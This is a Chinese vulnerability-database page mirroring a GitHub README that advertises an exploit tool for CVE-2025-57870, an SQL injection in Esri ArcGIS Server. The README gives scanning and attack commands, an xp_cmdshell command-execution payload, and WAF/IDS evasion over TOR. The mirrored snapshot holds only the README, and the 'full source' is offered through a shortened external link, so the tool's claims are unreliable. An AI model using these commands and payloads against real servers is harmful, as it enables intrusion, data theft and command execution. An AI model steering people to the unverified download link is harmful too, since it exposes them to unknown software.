漏洞平台

POC详情： 4c7835b3cef7417f950801ee45b1ab29e45a65c2

来源

https://github.com/ByteHawkSec/CVE-2025-57870-POC

关联漏洞

标题： Esri ArcGIS Server SQL注入漏洞 (CVE-2025-57870)
描述：Esri ArcGIS Server是Esri公司的一个面向Web的可用于提供地理位置服务的企业级软件平台。 Esri ArcGIS Server 11.3版本、11.4版本和11.5版本存在SQL注入漏洞，该漏洞源于特定ArcGIS要素服务操作未经验证输入，可能导致SQL注入攻击。

描述

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Esri ArcGIS Server

介绍

# Esri ArcGIS Server SQL Injection Exploit - CVE-2025-57870

This repository provides a professional-grade exploit for CVE-2025-57870, a critical SQL injection vulnerability in Esri ArcGIS Server versions 11.3, 11.4, and 11.5. The tool targets the Feature Service `/query` endpoint, enabling unauthenticated remote execution of arbitrary SQL commands on the underlying Enterprise Geodatabase. Designed for penetration testers and security researchers, it supports data exfiltration, modification, and potential RCE on certain database backends.  

**Note:** Full source code access - **[href](https://tinyurl.com/3zjbu33f)** . This repository contains core exploit logic and utilities for authorized testing.  

## Features
- Unauthenticated exploitation of ArcGIS Feature Services.
- Supports MSSQL, Oracle, and PostgreSQL backends.
- Modes: Error-based, blind (time-based), and out-of-band (OOB) injection.
- Built-in scanner for identifying vulnerable ArcGIS instances.
- Evasion techniques: Randomized delays, User-Agent rotation, proxy support (TOR/SOCKS).
- Post-exploitation: Schema enumeration, table dumping, and command execution.

## Repository Structure
- `sqli_exploit.py`: Main exploit script with modular injection logic.
- `scanner.py`: Network scanner to detect vulnerable ArcGIS servers.
- `payload_generator.py`: Generates custom SQL payloads for specific actions.
- `evasion_utils.py`: Evasion utilities for bypassing IDS/IPS.
- `db_backends/`: Backend-specific payload handlers (mssql.py, oracle.py, postgres.py).
- `config.yaml`: Configuration file for target, proxy, and logging settings.
- `requirements.txt`: Python dependencies.
- `exploited_data/`: Output directory for dumped data.
- `demo.mp4/`: A video instruction manual
## Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt`

## Setup
1. Configure `config.yaml` with target details:
   ```yaml
   target:
     url: "https://target.com/ArcGIS/rest/services/ServiceName/FeatureServer/0/query"
     db_type: "mssql"  # Options: mssql, oracle, postgres
   proxy:
     enabled: false
     type: "socks5"
     address: "127.0.0.1:9050"
   logging:
     level: "debug"
     output_dir: "exploited_data"
   ```
2. Scan for vulnerable servers:  
   `python scanner.py --network 192.168.1.0/24 --port 6080`

## Usage
Run the exploit:  
`python sqli_exploit.py --target-url <URL> --mode blind --action dump_schema --output exploited_data/schema.json`

### Options
- `--target-url`: Full FeatureServer query URL (required).
- `--mode`: `error`, `blind`, or `oob` (default: error).
- `--action`: `dump_schema`, `dump_table`, `execute_cmd` (required).
- `--db-type`: `mssql`, `oracle`, or `postgres` (required).
- `--table`: Target table for `dump_table` action (optional).
- `--custom-payload`: Raw SQL payload for custom injections (optional).
- `--evade`: Enable evasion techniques (default: off).
- `--output`: Output file for results (default: exploited_data/output.json).

### Examples
1. Dump database schema (MSSQL):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --action dump_schema --db-type mssql --output schema.json`

2. Dump specific table (Oracle):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode blind --action dump_table --db-type oracle --table users --output users.json`

3. Attempt RCE (MSSQL xp_cmdshell):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --db-type mssql --custom-payload "; EXEC xp_cmdshell 'whoami' --" --output cmd_output.txt`

## Evasion Techniques
- `--evade`: Enables random delays (1-5s), User-Agent rotation, and proxy chaining.
- Proxy support: Configure TOR or SOCKS5 in `config.yaml`.
- Payload obfuscation: Automatic comment injection (e.g., `/**/`) to bypass WAFs.

## Get the exploit
### **[href](https://tinyurl.com/3zjbu33f)**
## Disclaimer
For authorized security testing only. Unauthorized use is illegal. The authors are not responsible for misuse or damages.  

##  Contact
For any questions or inquiries, please contact: bytehawkcorp@outlook.com

文件快照


 [4.0K]  /data/pocs/4c7835b3cef7417f950801ee45b1ab29e45a65c2
└── [4.1K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。